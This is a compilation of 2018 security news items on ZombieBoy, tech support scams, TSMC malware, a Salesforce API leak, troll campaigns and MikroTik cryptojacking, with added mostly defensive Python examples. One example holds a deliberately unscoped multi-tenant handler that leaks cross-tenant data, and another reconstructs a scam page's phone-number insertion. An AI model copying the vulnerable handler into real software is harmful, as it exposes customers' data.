“We’ve since confirmed the issue has been corrected, and we’re requiring the vendor to look at their technologies and procedures to detect and prevent similar issues going forward.”

TCM Bank

Businesses have to carefully review the security posture of their partners, because third-party incidents like this one can have a significant impact on their own operations.

“Many companies that experience a data breach or data leak are quick to place blame for the incident on a third-party that mishandled sensitive information. Sometimes this blame is entirely warranted, but more often such claims ring hollow in the ears of those affected — particularly when they come from banks and security providers.” concludes Krebs.

“Managing third-party risk can be challenging, especially for organizations with hundreds or thousands of partners”


ZombieBoy, a new Monero miner that earns its operators about $1,000 a month
6.8.2018 securityaffairs Cryptocurrency

A security researcher discovered a new crypto mining worm dubbed ZombieBoy that spreads through several exploits and takes steps to evade detection.
The security researcher James Quinn has spotted a new strain of crypto mining worm dubbed ZombieBoy that appears to be very profitable, spreads through several exploits and takes steps to evade detection.

The expert named the malware ZombieBoy because it uses a tool called ZombieBoyTools to drop its first DLL; it spreads using several exploits.

Unlike the MassMiner cryptocurrency miner, ZombieBoy uses the WinEggDrop port scanner rather than MassScan to search for new hosts to infect.

ZombieBoy

The malware uses Simplified Chinese strings, which suggests that its author is a Chinese speaker.

The ZombieBoy miner leverages several exploits, including:

CVE-2017-9073, an RDP vulnerability on Windows XP and Windows Server 2003
CVE-2017-0143, SMB vulnerability (MS17-010)
CVE-2017-0146, SMB vulnerability (MS17-010)
ZombieBoy also uses the NSA-linked EternalBlue exploit and the DoublePulsar backdoor to remotely install the main DLL; ZombieBoyTools is used to deploy them. Hosts patched with MS17-010 are not exposed to the two SMB vectors, and disabling SMBv1 closes them as well.

Once it has established a backdoor on the target system, it could deliver other malware families, such as ransomware and keyloggers.

According to Quinn, the 64.exe module downloaded by ZombieBoy uses DoublePulsar to install both an SMB backdoor and an RDP backdoor.
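Worms such as ZombieBoy (WinEggDrop sweeps, then the SMB and RDP exploits above) and the WannaCry variant that stopped TSMC's lines find victims by reaching many neighbours on 445 and 3389 in a short time. The following detection over flow records is an added example written for this page; it is not taken from Quinn's analysis or from TSMC's statement. The ports, the 60-second window, the 20-target threshold and all log lines are constructed assumptions.

```python
"""Flag hosts that sweep SMB (445) or RDP (3389) across many destinations.

Added example for this page; not from Quinn's ZombieBoy write-up. The flow
format "timestamp src dst dport", the port set and thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WORM_PORTS = {445, 3389}  # assumed: SMB and RDP, the two services ZombieBoy/WannaCry abuse


def parse_flows(text):
    """Yield (timestamp, src, dst, dport) from constructed 'ts src dst port' lines."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port = line.split()
        yield datetime.fromisoformat(ts), src, dst, int(port)


def sweep_sources(flows, window=timedelta(seconds=60), min_targets=20):
    """Return {src: max distinct worm-port destinations inside any window} for
    sources that reach min_targets or more. Many clients -> one file server is
    the benign direction and is not flagged; one host -> many peers is."""
    by_src = defaultdict(list)
    for ts, src, dst, port in flows:
        if port in WORM_PORTS:
            by_src[src].append((ts, dst))
    alerts = {}
    for src, events in by_src.items():
        events.sort()
        best = 0
        for i, (t0, _) in enumerate(events):
            targets = {d for t, d in events[i:] if t - t0 <= window}
            best = max(best, len(targets))
        if best >= min_targets:
            alerts[src] = best
    return alerts


def build_sample_flows():
    """Constructed flow log: benign SMB clients, a benign admin with a few RDP
    sessions, and one freshly installed tool host sweeping 60 neighbours on 445."""
    base = datetime(2018, 8, 3, 22, 10, 0)
    lines = []
    for k in range(30):  # 30 workstations -> one file server (many-to-one, benign)
        lines.append(f"{(base + timedelta(seconds=k)).isoformat()} 10.0.6.{10 + k} 10.0.5.5 445")
    for k, dst in enumerate(("10.0.5.40", "10.0.5.41", "10.0.5.42")):  # admin host, 3 RDP targets
        lines.append(f"{(base + timedelta(seconds=5 * k)).isoformat()} 10.0.6.2 {dst} 3389")
    for k in range(60):  # worm-like sweep: 60 distinct targets on 445 within 40 seconds
        ts = base + timedelta(seconds=10, milliseconds=650 * k)
        lines.append(f"{ts.isoformat()} 10.0.5.17 10.0.5.{20 + k} 445")
    return "\n".join(lines)


if __name__ == "__main__":
    for src, n in sweep_sources(parse_flows(build_sample_flows())).items():
        print(f"possible SMB/RDP sweep from {src}: {n} distinct targets inside one window")
```

The check is direction-sensitive on purpose: a file server contacted by thirty clients produces thirty one-target sources and no alert, while the single host that opens sixty SMB connections to sixty peers is what a worm looks like right after an unscanned tool is plugged into a flat fab network.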

The same component runs XMRig to mine Monero at around 43 KH/s, which at the then-current rate earned the operators slightly over $1,000 a month.

“In addition, 64.exe uses XMRIG to mine for XMR. Prior to shutting down one of its addresses on minexmr.com, ZombieBoy was mining at around 43KH/s. This would earn the attackers slightly over $1,000 per month at current Monero prices.” continues the analysis.

Quinn noted that the miner is updated constantly; he observes new samples daily.

The malware detects virtual machines and refuses to run in a virtualized environment, which hampers sandbox analysis.

Further details including IoCs are reported in the analysis published by the expert.


Tech Support Scams improved with adoption of Call Optimization Service
6.8.2018 securityaffairs
Spam

Security experts from Symantec are warning of tech support scams abusing Call Optimization Services to insert phone numbers.
Crooks are improving their tech support scams by using Call Optimization Services that are commonly used in legitimate call center operations to perform:

Tracking the source of inbound calls
Creation and management of phone numbers
Call load balancing
Call forwarding
Call analytics
Call routing
Call recording
Scammers continue to improve their techniques: they now use the service to dynamically insert phone numbers into their scam web pages and can tap its other features to make the scams more successful.

The scams begin when unsuspecting victims visit a malicious website or are redirected to a bogus website in various ways, such as through a malvertising campaign.

“The scam web page informs the victim that the computer has been blocked due to a malware infection and tries to lure the user into calling a “toll free” number for assistance. An audio file, stating that the computer is infected, is also played in the background when the user arrives on the scam web page.” reads the analysis published by Symantec.

tech support scams

The malicious page uses several tricks to keep victims from closing it: it displays notification dialogs in full-screen mode or runs a JavaScript routine that makes the browser unresponsive.
The page then shows the numbers to call to “fix” the problem, and panicked users tend to call them.

According to Symantec, crooks leverage call optimization services in order to dynamically insert phone numbers into a scam page.

This particular scam also performs browser fingerprinting: it retrieves the browser version and, based on it, redirects victims to different scam pages.

A script from the call optimization service checks for a specific tag in the scam URL and, if present, requests the scammer’s phone number from the service’s servers. When the servers respond, the tag triggers a “Callback” function that inserts the returned number into the page for the victim to call.

If the tag from the call optimization service is not present in the scam URL, the phone number is instead retrieved by loading an XML file with the function loadXMLDoc() and is then displayed on the scam page.

The advantage of the tag-based approach is that the inserted number can be localized: the service returns a different number depending on the victim’s country, so the victim is shown a number that reaches an operator who speaks their language.
“However, by using the call optimization service’s tag in the URL the scammers can dynamically insert phone numbers into their scam pages,” continues Symantec.

“This can be useful, for example, if victims are based in multiple countries, as the victim can be shown a phone number that calls someone that speaks their language.”

Crooks can also abuse call optimization services for other purposes, for example to gather call analytics or to load-balance calls during busy periods so that no victim’s call is lost.
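The two number-insertion paths Symantec describes (service tag in the URL with a callback, or a static XML file via loadXMLDoc()) and a scoring check for the page traits above, as an added example written for this page rather than code recovered from the scam or from Symantec. The query parameter name "ctag", the number pool, the XML layout and the sample HTML are all constructed assumptions.

```python
"""Reconstruction of the scam page's number selection, plus a page scorer.

Added example; not Symantec's code or the scammers'. The tag parameter name
(ctag), number pool, XML file and sample pages are constructed.
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlparse

TAG_PARAM = "ctag"  # assumed name of the call-optimization tag carried in the scam URL

# Constructed stand-in for the service's number pool: campaign tag -> country -> number.
SERVICE_NUMBERS = {
    "cmp-7f3a": {"US": "+1-800-555-0100", "DE": "+49-800-555-0100", "default": "+1-800-555-0199"},
}

# Constructed stand-in for the static XML fetched by loadXMLDoc() when no tag is present.
FALLBACK_XML = """<numbers>
  <number country="US">+1-855-555-0123</number>
  <number country="default">+1-855-555-0124</number>
</numbers>"""


def service_lookup(tag, country):
    """Mimic the call-optimization service: a localized number for a known tag, else None."""
    pool = SERVICE_NUMBERS.get(tag)
    if pool is None:
        return None
    return pool.get(country, pool.get("default"))


def load_xml_doc(xml_text, country):
    """Mimic the fallback loadXMLDoc() path: pick a number from the static XML file."""
    root = ET.fromstring(xml_text)
    by_country = {n.get("country"): n.text.strip() for n in root.findall("number")}
    return by_country.get(country, by_country.get("default"))


def pick_number(url, country):
    """Return (number, path): 'callback' when the URL tag resolved, otherwise 'xml'."""
    tag = parse_qs(urlparse(url).query).get(TAG_PARAM, [None])[0]
    if tag:
        number = service_lookup(tag, country)
        if number:
            return number, "callback"
    return load_xml_doc(FALLBACK_XML, country), "xml"


# Detection side: traits of the page described above, with weights (assumed values).
INDICATORS = [
    (re.compile(r"loadXMLDoc\s*\(", re.I), "xml number fetch", 2),
    (re.compile(r"\bCallback\s*\(", re.I), "service callback", 2),
    (re.compile(r"requestFullscreen|webkitRequestFullScreen", re.I), "forced fullscreen", 2),
    (re.compile(r"<audio[^>]+autoplay", re.I), "autoplaying audio", 2),
    (re.compile(r"computer (has been|is) (blocked|infected)", re.I), "scare text", 3),
    (re.compile(r"toll[- ]free", re.I), "toll-free lure", 1),
]


def score_page(url, html):
    """Return (score, matched indicator names); a score of 5 or more is worth flagging."""
    score, hits = 0, []
    for rx, name, weight in INDICATORS:
        if rx.search(html):
            score += weight
            hits.append(name)
    if TAG_PARAM in parse_qs(urlparse(url).query):
        score += 2
        hits.append("call-optimization tag in URL")
    return score, hits


# Constructed sample pages, not captured from a real campaign.
SAMPLE_SCAM_HTML = """<html><body onload="document.documentElement.requestFullscreen()">
<audio autoplay src="alert.mp3"></audio>
<h1>Your computer has been blocked</h1>
<p>Call toll free <span id="phone"></span> for assistance</p>
<script>function loadXMLDoc(){ /* fetch numbers.xml and fill #phone */ }</script>
</body></html>"""
SAMPLE_BENIGN_HTML = "<html><body><p>Welcome to our store</p></body></html>"

if __name__ == "__main__":
    url = "https://example.invalid/alert?ctag=cmp-7f3a"
    print(pick_number(url, "DE"), pick_number("https://example.invalid/alert", "IT"))
    print(score_page(url, SAMPLE_SCAM_HTML))
```

The scorer keys on behaviour rather than on a phone number, because the whole point of the service is that the number changes per campaign and per country; a proxy or crawler that blocked by number would be a step behind every rotation.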


Malware Hits Plants of Chip Giant TSMC
6.8.2018 securityweek
Virus

A piece of malware has caused significant disruptions in the factories of Taiwan Semiconductor Manufacturing Company (TSMC), the world’s biggest contract chipmaker.

TSMC’s most important customer is Apple, whose iPhone and iPad products use TSMC chips, but the company also supplies semiconductors to Qualcomm, Nvidia, AMD, MediaTek and Broadcom.

In a statement published on its website on Sunday, the company described the incident as a “computer virus outbreak” that impacted an unspecified number of computer systems and fabrication tools in Taiwan.

The infection was discovered on August 3 and the semiconductor foundry said it had restored 80 percent of systems by August 5, with a full recovery expected by August 6.

The company expects the incident to have a significant impact on its revenue for the third quarter. Financial Times reported that its revenue will take a hit of roughly $255 million.

“TSMC expects this incident to cause shipment delays and additional costs. We estimate the impact to third quarter revenue to be about three percent, and impact to gross margin to be about one percentage point. The Company is confident shipments delayed in third quarter will be recovered in the fourth quarter 2018, and maintains its forecast of high single-digit revenue growth for 2018 in U.S. dollars given on July 19, 2018,” TSMC stated.

“Most of TSMC’s customers have been notified of this event, and the Company is working closely with customers on their wafer delivery schedule. The details will be communicated with each customer individually over the next few days,” the company added.

According to TSMC, the malware made its way onto the network due to “misoperation” during the installation of a new tool. The company said the incident did not affect data integrity and it did not result in confidential information getting compromised.


Salesforce warns of API error that exposed Marketing data
5.8.2018 securityweek
Vulnerability

The US Cloud-based customer relationship management software giant Salesforce is warning marketing customers of a data leakage caused by an API error.
The US cloud computing company Salesforce is warning marketing customers of a data leakage caused by an API error. The incident could potentially affect a large number of companies, including Aldo, Dunkin Donuts, GE, HauteLook, Nestle Waters, and Sony.

The error was in production from June 4 to July 18 and potentially affected users of two modules within the broader Marketing Cloud offering, the Email Studio and Predictive Intelligence solutions.

“On July 18, we became aware of an issue that impacted a subset of Marketing Cloud customers using Marketing Cloud Email Studio and Predictive Intelligence.” reads the notice published by Salesforce.

“We resolved the issue on that same day, July 18. Customers who may have been impacted were notified. For additional details, please see the Email Studio and Predictive Intelligence REST API Issue article here: https://sfdc.co/XIbG2”

salesforce marketing-cloud

The news was first reported by BankInfoSecurity that obtained a copy of the alert distributed by the company via email on Thursday.

Salesforce states that the error involved the company’s REST application programming interface.

“During a Marketing Cloud release between June 4, 2018, and July 7, a code change was introduced that, in rare cases, could have caused REST API calls to retrieve or write data from one customer’s account to another inadvertently,” reads the alert issued by Salesforce and published by BankInfoSecurity.

“Where the issue occurred, the API call may have failed and generated an error message rather than writing or modifying data.”

The company also warns that some customers’ data may have been corrupted; it has posted a knowledge article on the issue.

The bad news for customers is that Salesforce cannot say whether their data was viewed or altered by another tenant, or whether anyone exploited the issue maliciously.

“We have no evidence of malicious behavior associated with this issue,” a Salesforce spokesman told ISMG.

“We are unable to confirm if your data was viewed or modified by another customer,” Salesforce explained in its alert, noting that it was notifying all customers just to be on the safe side. “While Salesforce continues to conduct additional quality checks and testing in relation to this issue, we recommend that you monitor and review your data carefully to ensure the accuracy of your account.”
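The bug class in Salesforce’s notice, a REST call that reads or writes another customer’s records, is the classic missing tenant check. The following is an added illustration written for this page in a generic multi-tenant style; it is not Salesforce’s code and says nothing about how their defect actually arose. Record ids, tenant names and the access log are constructed.

```python
"""Cross-tenant read/write in a multi-tenant REST backend: unscoped vs scoped.

Added example for this page; not Salesforce's implementation. Data is constructed.
"""
from dataclasses import dataclass, field


class TenantMismatch(Exception):
    """Raised when a record is missing or belongs to a different tenant."""


@dataclass
class Subscriber:
    record_id: str
    tenant_id: str
    email: str


@dataclass
class SubscriberStore:
    rows: dict = field(default_factory=dict)  # record_id -> Subscriber

    # Vulnerable pattern: the handler trusts the record id and never asks who owns it,
    # so a caller from tenant A can read or overwrite tenant B's subscriber.
    def get_unscoped(self, record_id, caller_tenant):
        return self.rows[record_id]

    def update_unscoped(self, record_id, caller_tenant, email):
        self.rows[record_id].email = email
        return self.rows[record_id]

    # Hardened pattern: every read and write is filtered by the caller's tenant, which
    # the API layer must take from the authenticated session, never from the request.
    def get_scoped(self, record_id, caller_tenant):
        row = self.rows.get(record_id)
        if row is None or row.tenant_id != caller_tenant:
            # Same failure for "missing" and "not yours" so ids cannot be enumerated.
            raise TenantMismatch(record_id)
        return row

    def update_scoped(self, record_id, caller_tenant, email):
        row = self.get_scoped(record_id, caller_tenant)
        row.email = email
        return row


def scoped_read_allowed(store, record_id, caller_tenant):
    """Convenience wrapper: True when the scoped read succeeds, False when it is refused."""
    try:
        store.get_scoped(record_id, caller_tenant)
        return True
    except TenantMismatch:
        return False


def cross_tenant_accesses(store, access_log):
    """Post-incident review of (caller_tenant, record_id, op) entries: list the ones
    that touched a record owned by another tenant, with the true owner appended."""
    leaks = []
    for caller_tenant, record_id, op in access_log:
        row = store.rows.get(record_id)
        if row is not None and row.tenant_id != caller_tenant:
            leaks.append((caller_tenant, record_id, op, row.tenant_id))
    return leaks


def make_store():
    """Constructed two-tenant data set."""
    s = SubscriberStore()
    s.rows["sub-001"] = Subscriber("sub-001", "tenant-A", "a@example.com")
    s.rows["sub-002"] = Subscriber("sub-002", "tenant-B", "b@example.com")
    return s


if __name__ == "__main__":
    store = make_store()
    print("unscoped leak:", store.get_unscoped("sub-002", "tenant-A"))
    print("scoped allowed:", scoped_read_allowed(store, "sub-002", "tenant-A"))
```

The review helper is the part a customer can actually use after a notice like this one: if API audit logs exist, replaying them against current ownership answers the question Salesforce says it cannot, namely whether a given record was touched from the wrong account.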


Do Businesses Know When They’re Using Unethical Data?
5.8.2018 securityweek Security

Data breaches are costly for the businesses that experience them; the stolen data fuels black markets and is sometimes offered to companies as legitimate data.
Data breaches are extraordinarily costly for businesses that experience them, both in reputational damage and in the money spent to repair the damage. And, on the consumer side, the scary thing is that hackers don’t just steal data for notoriety. They do it to profit, typically by selling the stolen details online.

But, then, are other businesses aware of times when the data they just bought might have been stolen instead of legally obtained?

People Can Access Most of the Relevant Black Market Sites on Standard Browsers
There was a time when venturing into the online black market typically meant downloading anonymizing software that hid the identity of users. However, most black market transactions now happen on the “open” web, so it is possible to reach the relevant sites with browsers like Firefox and Chrome without downloading special software first.

That means business representatives can come across stolen data simply by browsing the internet normally. However, the kind of information advertised on the open web should raise eyebrows by itself: it often contains credit card numbers or sensitive medical details, not merely names, email addresses or phone numbers.

Companies can reduce the chances of unknowingly benefiting from stolen data by not proceeding with purchases if they contain private, not readily obtainable details.

Illegitimate Sellers Avoid Giving Payment Details
Even when people seek to profit by peddling stolen data, their desire to make money typically isn’t stronger than their need to remain anonymous. Most criminals who deal with data from illegal sources don’t reveal their names even when seeking payment. They’ll often request money through means that allow keeping their identities secret, such as Bitcoin.

Less Information, More Suspicion
If companies encounter data sellers that stay very secretive about how they get their data and whether it is in compliance with data protection and sharing standards, those are red flags.

However, even when data providers do list information about how they obtain data, it’s a good idea to validate the data on your own. For example, if you get calling data from a third-party provider, you should always check it against current Do Not Call lists.

Dark Web Monitoring Services Exist
As mentioned above, stolen data frequently works its way through the open web rather than the dark web. However, it’s still advisable for companies to utilize monitoring services that search the dark web for stolen data. The market for such information is lucrative, and some clients pay as much as $150,000 annually for such screening measures. If businesses provide data that comes up as originating from the dark web, that’s a strong indicator that it came from unethical sources.

data breaches

Do Legitimate Companies Create the Demand for Stolen Data?
It’s difficult to quantify how many reputable companies might be purchasing stolen data. If they do it knowingly, such a practice breaks the law. And, even if it happens without their knowledge, that’s still a poor reflection on those responsible. It means they didn’t carefully check data sources and sellers before going through with a purchase.

Unfortunately, analysts believe it happens frequently. After data breaches occur, some of the affected companies discover their data being sold online and buy it back. When hackers realize even those who initially had the data seized will pay for it, they realize there’s a demand for their criminal actions.

After suffering data breaches, some companies even ask their own employees to find stolen data and buy it back.

Most use intermediary parties, though representatives at major companies, including PayPal, acknowledge that this process of compensating hackers for the data they took occurs regularly. They say it’s part of the various actions that happen to protect customers — or to prevent them from knowing breaches happened at all.

If companies can find and recover their stolen data quickly enough, customers might never realize hackers had their details. That’s especially likely, since affected parties often don’t hear about breaches until months after companies do, giving those entities ample time to locate data and offer hackers a price for it.

Plus, it’s important to remember that companies pay tens of thousands of dollars to recover their data after ransomware attacks, too.

Should Businesses Bear the Blame?
When companies buy data that’s new to them, they should engage in the preventative measures above to verify its sources and check that it’s not stolen. Also, although businesses justify buying compromised data back from hackers, they have to remember that by doing so, they are stimulating demand — and that makes them partially to blame.

Instead of spending money to retrieve data that hackers take, those dollars would be better spent cracking down on the vulnerabilities that allow breaches to happen so frequently.


Russian troll factory suspected to be behind the attack against Italian President Mattarella
5.8.2018 securityweek BigBrothers

A Russian shadow hangs over the attack on Italian President Mattarella, a coordinated Twitter campaign in which hundreds of profiles called on him to resign.
Cybersecurity experts and Italian media believe that Italian President Sergio Mattarella is the latest victim of the Russian troll farm.

In the late afternoon of May 27, thousands of Twitter profiles suddenly started spreading messages against the Italian president asking him to resign.

The messages appeared to be a coordinated attack using the hashtag #MattarellaDimettiti (Italian for “Mattarella resign”). Messages using the hashtag spread rapidly; many legitimate users picked it up, and it is still easy to find genuine messages using it today.

But someone triggered the online protest, someone with a clear interest in destabilizing the Italian government.

The current deputy prime minister, Luigi Di Maio, was calling for the impeachment of President Mattarella, who had refused to endorse a candidate for Minister of Economy because of the candidate’s known anti-euro position.

Analysis of Twitter activity revealed an anomalous spike in the number of messages against President Mattarella at around two o’clock in the morning.

President Mattarella

Were these sleepless Italians, or was someone attempting to influence public sentiment on specific topics?

According to the Huffington Post Italy, in just a few minutes about 400 new profiles appeared, all traced back to a single origin, coordinating the disinformation campaign.
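The two signals the Italian analysts leaned on, a burst of messages at an hour when the audience is asleep and a cluster of profiles created within minutes of each other, can be computed from nothing more than timestamps. What follows is an added example written for this page, not the Huffington Post’s or Corriere della Sera’s method; the timeline, the 02:00 spike, the 400 accounts and the thresholds are all constructed assumptions.

```python
"""Spot a per-minute message spike and a burst of freshly created accounts.

Added example for this page; not the analysts' code. All timestamps are constructed.
"""
from collections import Counter
from datetime import datetime, timedelta
from statistics import median

SPIKE_MINUTE = datetime(2018, 5, 28, 2, 0)  # constructed: the "2 a.m." minute


def minute_of(ts):
    return ts.replace(second=0, microsecond=0)


def rate_spikes(tweet_times, factor=5.0, min_count=20):
    """Minutes whose message count is at least factor x the median per-minute count
    (and at least min_count, so a quiet timeline does not flag every minute)."""
    counts = Counter(minute_of(t) for t in tweet_times)
    if not counts:
        return []
    baseline = median(counts.values())
    return sorted(m for m, c in counts.items() if c >= max(min_count, factor * baseline))


def creation_bursts(created_at, window=timedelta(minutes=5), threshold=100):
    """Non-overlapping windows of account-creation times holding threshold or more
    accounts; returns (window start, count) per burst."""
    times = sorted(created_at)
    bursts, i = [], 0
    while i < len(times):
        start, j = times[i], i
        while j < len(times) and times[j] - start <= window:
            j += 1
        if j - i >= threshold:
            bursts.append((start, j - i))
            i = j
        else:
            i += 1
    return bursts


def build_sample():
    """Constructed timeline: two messages a minute from 22:00 to 01:59, then 150
    messages inside 02:00 from 400 accounts registered within three minutes,
    alongside 50 old accounts created one per day in 2015."""
    quiet_start = datetime(2018, 5, 27, 22, 0)
    tweets = []
    for m in range(240):
        tweets += [quiet_start + timedelta(minutes=m, seconds=s) for s in (5, 35)]
    tweets += [SPIKE_MINUTE + timedelta(seconds=k % 60) for k in range(150)]
    created = [datetime(2015, 1, 1) + timedelta(days=d) for d in range(50)]
    created += [SPIKE_MINUTE + timedelta(milliseconds=450 * k) for k in range(400)]
    return tweets, created


if __name__ == "__main__":
    tweets, created = build_sample()
    print("spike minutes:", rate_spikes(tweets))
    print("creation bursts:", creation_bursts(created))
```

Neither signal attributes anything on its own; what they give an analyst is the short list of accounts and minutes worth pulling into a deeper look, such as the comparison against the Internet Research Agency archive described next.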

The Huffington Post reported that the Italian Polizia Postale confirmed the campaign had a single source, but that the countermeasures adopted by the attackers made it impossible to locate the control room and attribute the attack to a specific threat actor.

“It is well known that, with high probability, it should have been created abroad, even if no one is able to say whether the Russian operators involved in disruptive actions in the American election campaign are involved.” states the Huffington Post citing the Italian newspaper Corriere della Sera.

According to the Huffington Post, at least twenty of the Twitter profiles involved in the attack on President Mattarella, belonging to completely unsuspecting Italians, had been used one or more times by the Internet Research Agency (IRA) of Saint Petersburg, also known as the Russian troll factory.

The same accounts were involved in other propaganda campaigns in favor of populist, sovereigntist and anti-European parties.

This is the conclusion of an analysis conducted on a sample covering 67% of the archive of Internet Research Agency (IRA) activity published by the FiveThirtyEight website.

The website published 3 million Russian troll tweets tied to the accounts examined by Special Counsel Robert Mueller as part of the investigation into Russian influence on the 2016 presidential election.

The tweets were collected by the researchers Darren Linvill and Patrick Warren of Clemson University.

The archive includes roughly 16,000 tweets in Italian; according to Corriere della Sera, some of the accounts were particularly active and stoked discussions against government representatives.

Now let me close with a simple consideration … the propaganda online attributed to the Internet Research Agency is really very noisy, and I fear it was designed to be so, likely under a wider diversionary strategy.

With more sophisticated technologies it is possible to obtain better results; think of the involvement of artificial intelligence.

Putin said several times that the nation that leads in AI ‘will be the ruler of the world,’ and I’m sure that the involvement of machine learning systems in a troll factory can produce results much better than actual ones.

Is the Internet Research Agency itself part of a bigger troll farm that already leverages artificial intelligence?


Malware paralyzed the TSMC plants that make chips for Apple devices
5.8.2018 securityweek
Virus

A virus infected systems at several Taiwan Semiconductor Manufacturing Co. (TSMC) factories on Friday night, the plants that make the chips for Apple’s devices.
Malware infected systems at several Taiwan Semiconductor Manufacturing Co. (TSMC) factories on Friday night, disrupting the iPhone chipmaker’s plants.

TSMC is the world’s biggest contract manufacturer of chips for tech giants, including Apple and Qualcomm Inc.

According to Bloomberg that first reported the news, the infection caused one of the most severe disruptions suffered by the company as it ramps up chipmaking for Apple Inc.’s next iPhones.

The company contained the problem, but some of the affected plants will not be able to restart before Sunday.
“The sole maker of the iPhone’s main processor said a number of its fabrication tools had been infected, and while it had contained the problem and resumed some production, several of its factories won’t restart till at least Sunday. The virus wasn’t introduced by a hacker, the company added in a statement.” states the Bloomberg.

“Certain factories returned to normal in a short period of time, and we expect the others will return to normal in one day,” the company said in its Saturday statement.

This is the first time malware has crippled TSMC production; according to the company, “the degree of infection varied from factory to factory.”
“TSMC has been attacked by viruses before, but this is the first time a virus attack has affected our production lines,” Chief Financial Officer Lora Ho told Bloomberg News by phone.

TSMC Apple infection

The economic impact of such incidents can be severe; at the time of writing there was no information on the losses suffered by the Taiwanese firm.

Nor is it yet possible to estimate the effect on the production of Apple devices; as Bloomberg put it, “the implications are also unclear for Apple.”

“The incident comes weeks after TSMC cheered investors with a rosy outlook for smartphone demand in the latter half of the year. That helped the market look past a reduced revenue outlook.” reported Bloomberg.

“A bellwether for the chip industry as well as an early indicator of iPhone demand, it heads into its busiest quarters grappling with waning enthusiasm for the high-powered chips used to mine digital currencies. Chief Executive Officer C. C. Wei had said TSMC’s sales will rise this year by a high single-digit percentage in U.S. dollar terms, down from an already reduced projection of about 10 percent”


MikroTik Routers Exploited in Massive Crypto-Mining Campaign
4.8.2018 securityweek
Exploit  Cryptocurrency

Attackers managed to infect tens of thousands of MikroTik network routers in Brazil with code that injects the CoinHive in-browser crypto-mining script into web traffic.

The attack emerged on July 31, when more than 70,000 MikroTik devices in the country started displaying the same behavior. With all using the same CoinHive site-key, it became apparent that a single actor was behind the attack.

No zero-day was used in this massive attack, as MikroTik, a Latvian router manufacturer, patched the targeted vulnerability back in April 2018. The issue, however, is that the vulnerable devices haven’t been updated in a timely manner.

At the moment, there are “hundreds of thousands of unpatched (and thus vulnerable) devices still out there, and tens of thousands of them are in Brazil alone,” Trustwave’s Simon Kenin, the researcher who analyzed the attack, reveals.

The employed exploit provides the attacker with the ability to read files from a vulnerable MikroTik router and get unauthenticated remote admin access to the device.

As part of this attack, however, the actor didn’t run a malicious executable on the router, but leveraged the device’s functionality to inject the CoinHive script into every web page the user visited.

For that, the attacker created a custom error page with the CoinHive script in it, which resulted in the user landing on that page when encountering any kind of error page while browsing. The attack works in both directions, meaning that users who visit websites behind those infected routers are impacted as well.

Initially, users would encounter the CoinHive script on every visited page, likely because the attacker, who appears to have a thorough understanding of how MikroTik routers work, might have built code to inject the script into every page.

In addition to modifying the device’s settings to serve the crypto-mining error page, the attacker also created a backdoor on the compromised devices. Kenin also noticed that the script has been updated several times during his investigation.

“The attacker seems to be adding more cleanup commands to leave a smaller footprint and reduce risk of being detected,” the researcher notes.

Kenin also noticed that, although the attack was initially focused on Brazil, MikroTik devices in other countries started being infected as well. In fact, he eventually discovered that over 170,000 routers globally appeared to have the CoinHive site-key.

By targeting MikroTik’s vulnerable carrier-grade router devices, the attackers ensured a broad reach: impacted are not only users behind the routers, but also the visitors of any website hosted behind such a router.

“There are hundreds of thousands of these devices around the globe, in use by ISPs and different organizations and businesses, each device serves at least tens if not hundreds of users daily,” Kenin points out.

While the routers were exploited to deliver a crypto-mining payload, the devices could have been exploited for other objectives, Sean Newman, Director Product Management at Corero Network Security, told SecurityWeek. "From a DDoS perspective, the scale of processing power available in such devices could easily be leveraged for a single attack which could extend to tens of terabits per second, or many smaller attacks if they were used as part of a DDoS for hire service," Newman said.
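The article's key observation is that every injected page carried the same CoinHive site-key, which is what tied tens of thousands of routers to one actor. The following is an added example (not code from the article, Trustwave or MikroTik) of how a defender reviewing captured HTTP responses, for instance from a proxy or a web-crawl of customer sites, can extract the miner's site-key from each body and cluster responses by key, so that one key recurring across unrelated hosts stands out as a campaign. The response bodies and the site-keys are constructed; the 20-64 character alphanumeric key format is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Patterns for the in-browser miner named in the article. The loader URL and
# the CoinHive.Anonymous()/CoinHive.User() constructor are how that script was
# embedded; the 20-64 alphanumeric key length is an assumption.
MINER_LOADER = re.compile(r"https?://[^\"'\s]*coinhive\.com/lib/[^\"'\s]*\.js", re.I)
MINER_SITE_KEY = re.compile(
    r"CoinHive\.(?:Anonymous|User)\(\s*['\"]([A-Za-z0-9]{20,64})['\"]", re.I
)

# Constructed sample HTTP response bodies (not real captures). Two unrelated
# hosts carry the same injected snippet and key, a third carries a different
# key, and the last one is clean.
SAMPLE_RESPONSES = {
    "http://shop.example.test/": (
        '<html><head><script src="https://coinhive.com/lib/coinhive.min.js"></script>'
        "<script>var m=new CoinHive.Anonymous('ConstructedKey0000000000000000A1');"
        "m.start();</script></head><body>shop</body></html>"
    ),
    "http://news.example.test/missing-page": (
        '<html><head><script src="https://coinhive.com/lib/coinhive.min.js"></script>'
        "<script>var m=new CoinHive.Anonymous('ConstructedKey0000000000000000A1');"
        "m.start();</script></head><body>404</body></html>"
    ),
    "http://blog.example.test/": (
        '<html><head><script src="https://coinhive.com/lib/coinhive.min.js"></script>'
        "<script>var m=new CoinHive.User('ConstructedKey0000000000000000B2','u');"
        "m.start();</script></head><body>blog</body></html>"
    ),
    "http://clean.example.test/": "<html><body>nothing injected here</body></html>",
}


def has_miner_loader(body: str) -> bool:
    """True when the response pulls in the miner's JavaScript loader."""
    return MINER_LOADER.search(body) is not None


def find_site_keys(body: str) -> list:
    """Return every site-key passed to the miner constructor in one body."""
    return MINER_SITE_KEY.findall(body)


def cluster_by_site_key(responses: dict) -> dict:
    """Map each site-key to the URLs whose responses carried it."""
    clusters = defaultdict(list)
    for url, body in responses.items():
        for key in find_site_keys(body):
            clusters[key].append(url)
    return dict(clusters)


def campaign_keys(clusters: dict, min_hosts: int = 2) -> list:
    """Keys seen on at least `min_hosts` distinct hosts. One key spread across
    unrelated sites is the single-actor signal the article describes."""
    return sorted(
        key for key, urls in clusters.items()
        if len({urlparse(u).netloc for u in urls}) >= min_hosts
    )


if __name__ == "__main__":
    found = cluster_by_site_key(SAMPLE_RESPONSES)
    for key in campaign_keys(found):
        print(f"campaign key {key}: {len(found[key])} injected responses")
```

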